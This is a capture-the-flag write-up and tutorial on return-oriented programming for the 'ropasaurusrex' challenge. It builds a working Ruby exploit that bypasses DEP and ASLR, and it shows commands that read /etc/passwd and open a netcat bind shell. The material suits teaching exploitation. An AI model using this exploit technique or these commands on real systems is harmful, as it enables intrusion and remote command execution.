ropasaurusrex: a primer on return-oriented programming

One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That’s what ROP’s all about, after all!

Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn’t think to bypass ASLR for quite awhile), the process we took of completing the level first without, then with ASLR, is actually a good way to show it, so I’ll take the same route on this post.

Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide! Coincidentally, I’ve been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I’d talk about it instead! This isn’t just a writeup, this is designed to be a fairly in-depth primer on return-oriented programming! If you’re more interested in the process of solving a CTF level, have a look at my writeup of cnot. :)

What the heck is ROP?

ROP—return-oriented programming—is a modern name for a classic exploit called “return into libc”. The idea is that you found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way get your code into executable memory (DEP, or data execution prevention, means that you can’t run code from anywhere you want anymore).

With ROP, you can pick and choose pieces of code that are already in sections executable memory and followed by a ‘return’. Sometimes those pieces are simple, and sometimes they’re complicated. In this exercise, we only need the simple stuff, thankfully!

But, we’re getting ahead of ourselves. Let’s first learn a little more about the stack! I’m not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial.

The stack

I’m sure you’ve heard of the stack before. Stack overflows? Smashing the stack? But what’s it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you!

The simple idea is, let’s say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you’re in C(), the stack looks like this:

+----------------------+
|         ...          | (higher addresses)
+----------------------+

+----------------------+ <-- start of 'A's stack frame
|   [return address]   | <-- address of whatever called 'A'
+----------------------+
|   [frame pointer]    |
+----------------------+
|   [local variables]  |
+----------------------+

+----------------------+ <-- start of 'B's stack frame
|         2 (parameter)|
+----------------------+
|         1 (parameter)|
+----------------------+
|   [return address]   | <-- the address that 'B' returns to
+----------------------+
|   [frame pointer]    |
+----------------------+
|   [local variables]  | 
+----------------------+

+----------------------+ <-- start of 'C's stack frame
|         4 (parameter)|
+----------------------+
|         3 (parameter)|
+----------------------+
|   [return address]   | <-- the address that 'C' returns to
+----------------------+

+----------------------+
|         ...          | (lower addresses)
+----------------------+

This is quite a mouthful (eyeful?) if you don’t live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new “stack frame” is built. A “frame” is simply some memory that the function allocates for itself on the stack. In fact, it doesn’t even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable).

This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and b) return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address).

Have you ever wondered where a function’s local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you’d know: they wind up in an old stack frame that we return to later!

Now, let’s look at what’s stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom):

Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP.
Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP.
Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again.
Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored.

So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they’re not. We’re going to assume the caller cleans up, that is, the function doesn’t clean up after itself, since that’s is how it works in this challenge (and most of the time on Linux).

Heaven, hell, and stack frames

The main thing you have to understand to know ROP is this: a function’s entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It’s all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn’t actually, don’t bother looking).

Let’s say you call the sleep() function, and get to the first line; its stack frame is going to look like this:

          ...            <-- don't know, don't care territory (higher addresses)
+----------------------+
|      [seconds]       |
+----------------------+
|   [return address]   | <-- esp points here
+----------------------+
          ...            <-- not allocated, don't care territory (lower addresses)

When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, I mentioned it twice since I promised not to; I swear I won’t mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (ie, making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when it sleep() starts, the stack frame makes up its entire world.

When sleep() returns, it winds up looking like this:

          ...            <-- don't know, don't care territory (higher addresses)
+----------------------+
|      [seconds]       | <-- esp points here
+----------------------+
| [old return address] | <-- not allocated, don't care territory starts here now
+----------------------+
          ...            (lower addresses)

And, of course, the caller, after sleep() returns, will remove “seconds” from the stack by adding 4 to esp (later on, we’ll talk about how we have to use pop/pop/ret constructs to do the same thing).

In a properly working system, this is how life works. That’s a safe assumption. The “seconds” value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there?

Controlling the stack

…well, since you asked, let me tell you. We’ve all heard of a “stack overflow”, which involves overwriting a variable on the stack. What’s that mean? Well, let’s say we have a frame that looks like this:

          ...            <-- don't know, don't care territory (higher addresses)
+----------------------+
|      [seconds]       |
+----------------------+
|   [return address]   | <-- esp points here
+----------------------+
|     char buf[16]     |
|                      |
|                      |
|                      |
+----------------------+
          ...            (lower addresses)

The variable buf is 16 bytes long. What happens if a program tries to write to the 17^th byte of buf (i.e., buf[16])? Well, it writes to the last byte—little endian—of the return address. The 18^th byte writes to the second-last byte of the return address, and so on. Therefore, we can change the return address to point to anywhere we want. Anywhere we want. So when the function returns, where’s it go? Well, it thinks it’s going to where it’s supposed to go—in a perfect world, it would be—but nope! In this case, it’s going to wherever the attacker wants it to. If the attacker says to jump to 0, it jumps to 0 and crashes. If the attacker says to go to 0x41414141 (“AAAA”), it jumps there and probably crashes. If the attacker says to jump to the stack… well, that’s where it gets more complicated…

DEP

Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But, being that it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys :) ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack—or, more generally, anywhere an attacker can write—instead, it crashes.

So how the hell do I run code without being allowed to run code!?

Well, we’re going to get to that. But first, let’s look at the vulnerability that the challenge uses!

The vulnerability

Here’s the vulnerable function, fresh from IDA:

 1   .text:080483F4vulnerable_function proc near
 2   .text:080483F4
 3   .text:080483F4buf             = byte ptr -88h
 4   .text:080483F4
 5   .text:080483F4         push    ebp
 6   .text:080483F5         mov     ebp, esp
 7   .text:080483F7         sub     esp, 98h
 8   .text:080483FD         mov     dword ptr [esp+8], 100h ; nbytes
 9   .text:08048405         lea     eax, [ebp+buf]
10   .text:0804840B         mov     [esp+4], eax    ; buf
11   .text:0804840F         mov     dword ptr [esp], 0 ; fd
12   .text:08048416         call    _read
13   .text:0804841B         leave
14   .text:0804841C         retn
15   .text:0804841Cvulnerable_function endp

Now, if you don’t know assembly, this might look daunting. But, in fact, it’s simple. Here’s the equivalent C:

1   ssize_t __cdecl vulnerable_function()
2   {
3     char buf[136];
4     return read(0, buf, 256);
5   }

So, it reads 256 bytes into a 136-byte buffer. Goodbye Mr. Stack!

You can easily validate that by running it, piping in a bunch of ‘A’s, and seeing what happens:

1   ron@debian-x86 ~ $ ulimit -c unlimited
2   ron@debian-x86 ~ $ perl -e "print 'A'x300" | ./ropasaurusrex
3   Segmentation fault (core dumped)
4   ron@debian-x86 ~ $ gdb ./ropasaurusrex core
5   [...]
6   Program terminated with signal 11, Segmentation fault.
7   #0  0x41414141 in ?? ()
8   (gdb)

Simply speaking, it means that we overwrote the return address with the letter A 4 times (0x41414141 = “AAAA”).

Now, there are good ways and bad ways to figure out exactly what you control. I used a bad way. I put “BBBB” at the end of my buffer and simply removed ‘A’s until it crashed at 0x42424242 (“BBBB”):

1   ron@debian-x86 ~ $ perl -e "print 'A'x140;print 'BBBB'" | ./ropasaurusrex
2   Segmentation fault (core dumped)
3   ron@debian-x86 ~ $ gdb ./ropasaurusrex core
4   #0  0x42424242 in ?? ()

If you want to do this “better” (by which I mean, slower), check out Metasploit’s pattern_create.rb and pattern_offset.rb. They’re great when guessing is a slow process, but for the purpose of this challenge it was so quick to guess and check that I didn’t bother.

Starting to write an exploit

The first thing you should do is start running ropasaurusrex as a network service. The folks who wrote the CTF used xinetd to do this, but we’re going to use netcat, which is just as good (for our purposes):

1 $ while true; do nc -vv -l -p 4444 -e ./ropasaurusrex; done
2 listening on [any] 4444 ...

From now on, we can use localhost:4444 as the target for our exploit and test if it’ll work against the actual server.

You may also want to disable ASLR if you’re following along:

1 $ sudo sysctl -w kernel.randomize_va_space=0

Note that this will make your system easier to exploit, so I don’t recommend doing this outside of a lab environment!

Here’s some ruby code for the initial exploit:

 1 require 'socket'
 2 
 3 $ cat ./sploit.rb
 4 s = TCPSocket.new("localhost", 4444)
 5 
 6 # Generate the payload
 7 payload = "A"*140 +
 8   [
 9     0x42424242,
10   ].pack("I*") # Convert a series of 'ints' to a string
11 
12 s.write(payload)
13 s.close()

Run that with ruby ./sploit.rb and you should see the service crash:

1 connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53451
2 Segmentation fault (core dumped)

And you can verify, using gdb, that it crashed at the right location:

1 gdb --quiet ./ropasaurusrex core
2 [...]
3 Program terminated with signal 11, Segmentation fault.
4 #0  0x42424242 in ?? ()

We now have the beginning of an exploit!

How to waste time with ASLR

I called this section ‘wasting time’, because I didn’t realize—at the time—that ASLR was enabled. However, assuming no ASLR actually makes this a much more instructive puzzle. So for now, let’s not worry about ASLR—in fact, let’s not even define ASLR. That’ll come up in the next section.

Okay, so what do we want to do? We have a vulnerable process, and we have the libc shared library. What’s the next step?

Well, our ultimate goal is to run system commands. Because stdin and stdout are both hooked up to the socket, if we could run, for example, system(“cat /etc/passwd”), we’d be set! Once we do that, we can run any command. But doing that involves two things:

Getting the string cat /etc/passwd into memory somewhere
Running the system() function

Getting the string into memory

Getting the string into memory actually involves two sub-steps:

Find some memory that we can write to
Find a function that can write to it

Tall order? Not really! First things first, let’s find some memory that we can read and write! The most obvious place is the .data section:

1 ron@debian-x86 ~ $ objdump -x ropasaurusrex  | grep -A1 '\.data'
2  23 .data         00000008  08049620  08049620  00000620  2**2
3                    CONTENTS, ALLOC, LOAD, DATA
4

Uh oh, .data is only 8 bytes long. That’s not enough! In theory, any address that’s long enough, writable, and not used will be enough for what we need. Looking at the output for objdump -x, I see a section called .dynamic that seems to fit the bill:

1 
2  20 .dynamic      000000d0  08049530  08049530  00000530  2**2
3                    CONTENTS, ALLOC, LOAD, DATA

The .dynamic section holds information for dynamic linking. We don’t need that for what we’re going to do, so let’s choose address 0x08049530 to overwrite.

The next step is to find a function that can write our command string to address 0x08049530. The most convenient functions to use are the ones that are in the executable itself, rather than a library, since the functions in the executable won’t change from system to system. Let’s look at what we have:

 1 ron@debian-x86 ~ $ objdump -R ropasaurusrex
 2 
 3 ropasaurusrex:     file format elf32-i386
 4 
 5 DYNAMIC RELOCATION RECORDS
 6 OFFSET   TYPE              VALUE
 7 08049600 R_386_GLOB_DAT    __gmon_start__
 8 08049610 R_386_JUMP_SLOT   __gmon_start__
 9 08049614 R_386_JUMP_SLOT   write
10 08049618 R_386_JUMP_SLOT   __libc_start_main
11 0804961c R_386_JUMP_SLOT   read

So, we have read() and write() immediately available. That’s helpful! The read() function will read data from the socket and write it to memory. The prototype looks like this:

1 ssize_t read(int fd, void *buf, size_t count);

This means that, when you enter the read() function, you want the stack to look like this:

+----------------------+
|         ...          | - doesn't matter, other funcs will go here
+----------------------+

+----------------------+ <-- start of read()'s stack frame
|     size_t count     | - count, strlen("cat /etc/passwd")
+----------------------+
|      void *buf       | - writable memory, 0x08049530
+----------------------+
|        int fd        | - should be 'stdin' (0)
+----------------------+
|   [return address]   | - where 'read' will return
+----------------------+

+----------------------+
|         ...          | - doesn't matter, read() will use for locals
+----------------------+

We update our exploit to look like this (explanations are in the comments):

 1 $ cat sploit.rb
 2 require 'socket'
 3 
 4 s = TCPSocket.new("localhost", 4444)
 5 
 6 # The command we'll run
 7 cmd = ARGV[0] + "\0"
 8 
 9 # From objdump -x
10 buf = 0x08049530
11 
12 # From objdump -D ./ropasaurusrex | grep read
13 read_addr = 0x0804832C
14 # From objdump -D ./ropasaurusrex | grep write
15 write_addr = 0x0804830C
16 
17 # Generate the payload
18 payload = "A"*140 +
19   [
20     cmd.length, # number of bytes
21     buf,        # writable memory
22     0,          # stdin
23     0x43434343, # read's return address
24 
25     read_addr # Overwrite the original return
26   ].reverse.pack("I*") # Convert a series of 'ints' to a string
27 
28 # Write the 'exploit' payload
29 s.write(payload)
30 
31 # When our payload calls read() the first time, this is read
32 s.write(cmd)
33 
34 # Clean up
35 s.close()

We run that against the target:

1 ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"

And verify that it crashes:

1 listening on [any] 4444 ...
2 connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53456
3 Segmentation fault (core dumped)

Then verify that it crashed at the return address of read() (0x43434343) and wrote the command to the memory at 0x08049530:

1 $ gdb --quiet ./ropasaurusrex core
2 [...]
3 Program terminated with signal 11, Segmentation fault.
4 #0  0x43434343 in ?? ()
5 (gdb) x/s 0x08049530
6 0x8049530:       "cat /etc/passwd"

Perfect!

Running it

Now that we’ve written cat /etc/passwd into memory, we need to call system() and point it at that address. It turns out, if we assume ASLR is off, this is easy. We know that the executable is linked with libc:

1 $ ldd ./ropasaurusrex
2         linux-gate.so.1 =>  (0xb7703000)
3         libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb75aa000)
4         /lib/ld-linux.so.2 (0xb7704000)

And libc.so.6 contains the system() function:

1 $ objdump -T /lib/i686/cmov/libc.so.6 | grep system
2 000f5470 g    DF .text  00000042  GLIBC_2.0   svcerr_systemerr
3 00039450 g    DF .text  0000007d  GLIBC_PRIVATE __libc_system
4 00039450  w   DF .text  0000007d  GLIBC_2.0   system

We can figure out the address where system() ends up loaded in ropasaurusrex in our debugger:

1 $ gdb --quiet ./ropasaurusrex core
2 [...]
3 Program terminated with signal 11, Segmentation fault.
4 #0  0x43434343 in ?? ()
5 (gdb) x/x system
6 0xb7ec2450 <system>:    0x890cec83

Because system() only takes one argument, building the stackframe is pretty easy:

+----------------------+
|         ...          | - doesn't matter, other funcs will go here
+----------------------+

+----------------------+ <-- Start of system()'s stack frame
|      void *arg       | - our buffer, 0x08049530
+----------------------+
|   [return address]   | - where 'system' will return
+----------------------+
|         ...          | - doesn't matter, system() will use for locals
+----------------------+

Now if we stack this on top of our read() frame, things are looking pretty good:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s stack frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        |
+----------------------+
| [address of system]  | <-- Stack pointer
+----------------------+

+----------------------+
|         ...          |
+----------------------+

At the moment that read() returns, the stack pointer is in the location shown above. When it returns, it pops read()’s return address off the stack and jumps to it. When it does, this is what the stack looks like when read() returns:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        | <-- Stack pointer
+----------------------+
| [address of system]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Uh oh, that’s no good! The stack pointer is pointing to the middle of read()’s frame when we enter system(), not to the bottom of system()’s frame like we want it to! What do we do?

Well, when perform a ROP exploit, there’s a very important construct we need called pop/pop/ret. In this case, it’s actually pop/pop/pop/ret, which we’ll call “pppr” for short. Just remember, it’s enough “pops” to clear the stack, followed by a return.

pop/pop/pop/ret is a construct that we use to remove the stuff we don’t want off the stack. Since read() has three arguments, we need to pop all three of them off the stack, then return. To demonstrate, here’s what the stack looks like immediately after read() returns to a pop/pop/pop/ret:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- Special frame for pop/pop/pop/ret
| [address of system]  |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        | <-- Stack pointer
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

After “pop/pop/pop/ret” runs, but before it returns, we get this:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame
| [address of system]  | <-- stack pointer
+----------------------+

+----------------------+
|     size_t count     | <-- read()'s frame
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        |
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Then when it returns, we’re exactly where we want to be:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   | <-- stack pointer
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame
| [address of system]  |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        |
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Finding a pop/pop/pop/ret is pretty easy using objdump:

1 $ objdump -d ./ropasaurusrex | egrep 'pop|ret'
2 [...]
3  80484b5:       5b                      pop    ebx
4  80484b6:       5e                      pop    esi
5  80484b7:       5f                      pop    edi
6  80484b8:       5d                      pop    ebp
7  80484b9:       c3                      ret

This lets us remove between 1 and 4 arguments off the stack before executing the next function. Perfect!

And remember, if you’re doing this yourself, ensure that the pops are at consecutive addresses. Using egrep to find them can be a little dangerous like that.

So now, if we want a triple pop and a ret (to remove the three arguments that read() used), we want the address 0x80484b6, so we set up our stack like this:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       | - 0x08049530 (buf)
+----------------------+
|   [return address]   | - 0x44444444
+----------------------+

+----------------------+
| [address of system]  | - 0xb7ec2450
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     | - strlen(cmd)
+----------------------+
|      void *buf       | - 0x08049530 (buf)
+----------------------+
|        int fd        | - 0 (stdin)
+----------------------+
| [address of "pppr"]  | - 0x080484b6
+----------------------+

+----------------------+
|         ...          |
+----------------------+

We also update our exploit with a s.read() at the end, to read whatever data the remote server sends us. The current exploit now looks like:

 1 require 'socket'
 2 
 3 s = TCPSocket.new("localhost", 4444)
 4 
 5 # The command we'll run
 6 cmd = ARGV[0] + "\0"
 7 
 8 # From objdump -x
 9 buf = 0x08049530
10 
11 # From objdump -D ./ropasaurusrex | grep read
12 read_addr = 0x0804832C
13 # From objdump -D ./ropasaurusrex | grep write
14 write_addr = 0x0804830C
15 # From gdb, "x/x system"
16 system_addr = 0xb7ec2450
17 # From objdump, "pop/pop/pop/ret"
18 pppr_addr = 0x080484b6
19 
20 # Generate the payload
21 payload = "A"*140 +
22   [
23     # system()'s stack frame
24     buf,         # writable memory (cmd buf)
25     0x44444444,  # system()'s return address
26 
27     # pop/pop/pop/ret's stack frame
28     system_addr, # pop/pop/pop/ret's return address
29 
30     # read()'s stack frame
31     cmd.length,  # number of bytes
32     buf,         # writable memory (cmd buf)
33     0,           # stdin
34     pppr_addr,   # read()'s return address
35 
36     read_addr # Overwrite the original return
37   ].reverse.pack("I*") # Convert a series of 'ints' to a string
38 
39 # Write the 'exploit' payload
40 s.write(payload)
41 
42 # When our payload calls read() the first time, this is read
43 s.write(cmd)
44 
45 # Read the response from the command and print it to the screen
46 puts(s.read)
47 
48 # Clean up
49 s.close()

And when we run it, we get the expected result:

1 $ ruby sploit.rb "cat /etc/passwd"
2 root:x:0:0:root:/root:/bin/bash
3 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
4 bin:x:2:2:bin:/bin:/bin/sh
5 ...

And if you look at the core dump, you’ll see it’s crashing at 0x44444444 as expected.

Done, right?

WRONG!

This exploit worked perfectly against my test machine, but when ASLR is enabled, it failed:

1 $ sudo sysctl -w kernel.randomize_va_space=1
2 kernel.randomize_va_space = 1
3 ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"

This is where it starts to get a little more complicated. Let’s go!

What is ASLR?

ASLR—or address space layout randomization—is a defense implemented on all modern systems (except for FreeBSD) that randomizes the address that libraries are loaded at. As an example, let’s run ropasaurusrex twice and get the address of system():

 1 ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex
 2 Segmentation fault (core dumped)
 3 ron@debian-x86 ~ $ gdb ./ropasaurusrex core
 4 Program terminated with signal 11, Segmentation fault.
 5 #0  0x41414141 in ?? ()
 6 (gdb) x/x system
 7 0xb766e450 <system>:    0x890cec83
 8 
 9 ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex
10 Segmentation fault (core dumped)
11 ron@debian-x86 ~ $ gdb ./ropasaurusrex core
12 Program terminated with signal 11, Segmentation fault.
13 #0  0x41414141 in ?? ()
14 (gdb) x/x system
15 0xb76a7450 <system>:    0x890cec83

Notice that the address of system() changes from 0xb766e450 to 0xb76a7450. That’s a problem!

Defeating ASLR

So, what do we know? Well, the binary itself isn’t ASLRed, which means that we can rely on every address in it to stay put, which is useful. Most importantly, the relocation table will remain at the same address:

 1 $ objdump -R ./ropasaurusrex
 2 
 3 ./ropasaurusrex:     file format elf32-i386
 4 
 5 DYNAMIC RELOCATION RECORDS
 6 OFFSET   TYPE              VALUE
 7 08049600 R_386_GLOB_DAT    __gmon_start__
 8 08049610 R_386_JUMP_SLOT   __gmon_start__
 9 08049614 R_386_JUMP_SLOT   write
10 08049618 R_386_JUMP_SLOT   __libc_start_main
11 0804961c R_386_JUMP_SLOT   read

So we know the address—in the binary—of read() and write(). What’s that mean? Let’s take a look at their values while the binary is running:

1 $ gdb ./ropasaurusrex
2 (gdb) run
3 ^C
4 Program received signal SIGINT, Interrupt.
5 0xb7fe2424 in __kernel_vsyscall ()
6 (gdb) x/x 0x0804961c
7 0x804961c:      0xb7f48110
8 (gdb) print read
9 $1 = {<text variable, no debug info>} 0xb7f48110 <read>

Well look at that.. a pointer to read() at a memory address that we know! What can we do with that, I wonder…? I’ll give you a hint: we can use the write() function—which we also know—to grab data from arbitrary memory and write it to the socket.

Finally, running some code!

Okay, let’s break, this down into steps. We need to:

Copy a command into memory using the read() function.
Get the address of the write() function using the write() function.
Calculate the offset between write() and system(), which lets us get the address of system().
Call system().

To call system(), we’re gonna have to write the address of system() somewhere in memory, then call it. The easiest way to do that is to overwrite the call to read() in the .plt table, then call read().

By now, you’re probably confused. Don’t worry, I was too. I was shocked I got this working. :)

Let’s just go for broke now and get this working! Here’s the stack frame we want:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- system()'s frame [7]
|      void *arg       | 
+----------------------+
|   [return address]   | 
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame [6]
|  [address of read]   | - this will actually jump to system()
+----------------------+

+----------------------+ <-- second read()'s frame [5]
|     size_t count     | - 4 bytes (the size of a 32-bit address)
+----------------------+
|      void *buf       | - pointer to read() so we can overwrite it
+----------------------+
|        int fd        | - 0 (stdin)
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame [4]
|  [address of read]   |
+----------------------+

+----------------------+ <-- write()'s frame [3]
|     size_t count     | - 4 bytes (the size of a 32-bit address)
+----------------------+
|      void *buf       | - The address containing a pointer to read()
+----------------------+
|        int fd        | - 1 (stdout)
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame [2]
|  [address of write]  |
+----------------------+

+----------------------+ <-- read()'s frame [1]
|     size_t count     | - strlen(cmd)
+----------------------+
|      void *buf       | - writeable memory
+----------------------+
|        int fd        | - 0 (stdin)
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Holy smokes, what’s going on!?

Let’s start at the bottom and work our way up! I tagged each frame with a number for easy reference.

Frame [1] we’ve seen before. It writes cmd into our writable memory. Frame [2] is a standard pop/pop/pop/ret to clean up the read().

Frame [3] uses write() to write the address of the read() function to the socket. Frame [4] uses a standard pop/pop/pop/ret to clean up after write().

Frame [5] reads another address over the socket and writes it to memory. This address is going to be the address of the system() call. The reason writing it to memory works is because of how read() is called. Take a look at the read() call we’ve been using in gdb (0x0804832C) and you’ll see this:

1 (gdb) x/i 0x0804832C
2 0x804832c <read@plt>:   jmp    DWORD PTR ds:0x804961c

read() is actually implemented as an indirect jump! So if we can change what ds:0x804961c’s value is, and still jump to it, then we can jump anywhere we want! So in frame [3] we read the address from memory (to get the actual address of read()) and in frame [5] we write a new address there.

Frame [6] is a standard pop/pop/pop/ret construct, with a small difference: the return address of the pop/pop/pop/ret is 0x804832c, which is actually read()’s .plt entry. Since we overwrote read()’s .plt entry with system(), this call actually goes to system()!

Final code

Whew! That’s quite complicated. Here’s code that implements the full exploit for ropasaurusrex, bypassing both DEP and ASLR:

 1 require 'socket'
 2 
 3 s = TCPSocket.new("localhost", 4444)
 4 
 5 # The command we'll run
 6 cmd = ARGV[0] + "\0"
 7 
 8 # From objdump -x
 9 buf = 0x08049530
10 
11 # From objdump -D ./ropasaurusrex | grep read
12 read_addr = 0x0804832C
13 # From objdump -D ./ropasaurusrex | grep write
14 write_addr = 0x0804830C
15 # From gdb, "x/x system"
16 system_addr = 0xb7ec2450
17 # Fram objdump, "pop/pop/pop/ret"
18 pppr_addr = 0x080484b6
19 
20 # The location where read()'s .plt entry is
21 read_addr_ptr = 0x0804961c
22 
23 # The difference between read() and system()
24 # Calculated as  read (0xb7f48110) - system (0xb7ec2450)
25 # Note: This is the one number that needs to be calculated using the
26 # target version of libc rather than my own!
27 read_system_diff = 0x85cc0
28 
29 # Generate the payload
30 payload = "A"*140 +
31   [
32     # system()'s stack frame
33     buf,         # writable memory (cmd buf)
34     0x44444444,  # system()'s return address
35 
36     # pop/pop/pop/ret's stack frame
37     # Note that this calls read_addr, which is overwritten by a pointer
38     # to system() in the previous stack frame
39     read_addr,   # (this will become system())
40 
41     # second read()'s stack frame
42     # This reads the address of system() from the socket and overwrites
43     # read()'s .plt entry with it, so calls to read() end up going to
44     # system()
45     4,           # length of an address
46     read_addr_ptr, # address of read()'s .plt entry
47     0,           # stdin
48     pppr_addr,   # read()'s return address
49 
50     # pop/pop/pop/ret's stack frame
51     read_addr,
52 
53     # write()'s stack frame
54     # This frame gets the address of the read() function from the .plt
55     # entry and writes to to stdout
56     4,           # length of an address
57     read_addr_ptr, # address of read()'s .plt entry
58     1,           # stdout
59     pppr_addr,   # retrurn address
60 
61     # pop/pop/pop/ret's stack frame
62     write_addr,
63 
64     # read()'s stack frame
65     # This reads the command we want to run from the socket and puts it
66     # in our writable "buf"
67     cmd.length,  # number of bytes
68     buf,         # writable memory (cmd buf)
69     0,           # stdin
70     pppr_addr,   # read()'s return address
71 
72     read_addr # Overwrite the original return
73   ].reverse.pack("I*") # Convert a series of 'ints' to a string
74 
75 # Write the 'exploit' payload
76 s.write(payload)
77 
78 # When our payload calls read() the first time, this is read
79 s.write(cmd)
80 
81 # Get the result of the first read() call, which is the actual address of read
82 this_read_addr = s.read(4).unpack("I").first
83 
84 # Calculate the address of system()
85 this_system_addr = this_read_addr - read_system_diff
86 
87 # Write the address back, where it'll be read() into the correct place by
88 # the second read() call
89 s.write([this_system_addr].pack("I"))
90 
91 # Finally, read the result of the actual command
92 puts(s.read())
93 
94 # Clean up
95 s.close()

And here it is in action:

1 $ ruby sploit.rb "cat /etc/passwd"
2 root:x:0:0:root:/root:/bin/bash
3 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
4 bin:x:2:2:bin:/bin:/bin/sh
5 sys:x:3:3:sys:/dev:/bin/sh
6 [...]

You can, of course, change cat /etc/passwd to anything you want (including a netcat listener!)

 1 ron@debian-x86 ~ $ ruby sploit.rb "pwd"
 2 /home/ron
 3 ron@debian-x86 ~ $ ruby sploit.rb "whoami"
 4 ron
 5 ron@debian-x86 ~ $ ruby sploit.rb "nc -vv -l -p 5555 -e /bin/sh" &
 6 [1] 3015
 7 ron@debian-x86 ~ $ nc -vv localhost 5555
 8 debian-x86.skullseclabs.org [127.0.0.1] 5555 (?) open
 9 pwd
10 /home/ron
11 whoami
12 ron

Conclusion

And that’s it! We just wrote a reliable, DEP/ASLR-bypassing exploit for ropasaurusrex.

Feel free to comment or contact me if you have any questions!